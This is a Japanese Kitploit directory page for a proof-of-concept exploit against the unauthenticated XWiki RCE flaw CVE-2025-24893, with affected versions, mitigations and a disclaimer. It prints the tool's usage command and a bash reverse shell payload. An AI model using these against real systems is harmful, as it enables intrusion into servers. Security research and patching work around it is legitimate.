Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-24893-poc — CVE-2025-24893 の Proof-of-Concept エクスプロイト。これは XWiki における未認証のリモートコード実行 (RCE) 脆弱性です。Groovy スクリプト実行を介して SolrSearch エンドポイントのテンプレートインジェクションの欠陥を悪用します。 | Kitploit
ツール/GitHubGitHub/investigato/cve-2025-24893-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

CVE-2025-24893 の Proof-of-Concept エクスプロイト。これは XWiki における未認証のリモートコード実行 (RCE) 脆弱性です。Groovy スクリプト実行を介して SolrSearch エンドポイントのテンプレートインジェクションの欠陥を悪用します。

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-24893 — XWiki 未認証RCE (PoC)

CVE-2025-24893 の概念実証エクスプロイトです。XWiki における重大な未認証リモートコード実行(RCE) 脆弱性です。
このエクスプロイトは SolrSearch エンドポイントのGroovyテンプレートインジェクションを悪用し、認証なしで任意のコマンド(リバースシェルを含む)を実行します。

💥 脆弱性の詳細

XWikiが SolrSearch RSSエンドポイントへの細工された入力を処理する方法に欠陥があり、攻撃者がレンダリングパイプラインにGroovyコードを注入できます。
これにより、{{groovy}} スクリプトブロックを介した未認証RCE が可能になります。

✅ 影響を受けるバージョン

  • < 15.10.11
  • >= 16.0.0 かつ < 16.4.1

❌ 修正されたバージョン

  • 15.10.11
  • 16.4.1

🔧 使用方法

リリースをダウンロード:

Releases

またはソースからビルド:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

リバースシェルペイロード

以下の形式のビルトインリバースシェルペイロードがあります:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ 法的免責事項

このコードは教育および許可されたセキュリティ研究のみを目的としています。 所有していない、または明示的なテスト許可を得ていないシステムに対してこのエクスプロイトを使用しないでください。


✍️ クレジット

  • エクスプロイトPoC: Artemir7
  • Rust移植: investigato

🛡️ 検出と緩和策

  • XWiki 15.10.11 または 16.4.1+ に更新する
  • /bin/get/Main/SolrSearch?media=rss の不審な使用を監視する
  • 可能であれば匿名ユーザーのGroovy実行を無効にする
ツールをダウンロード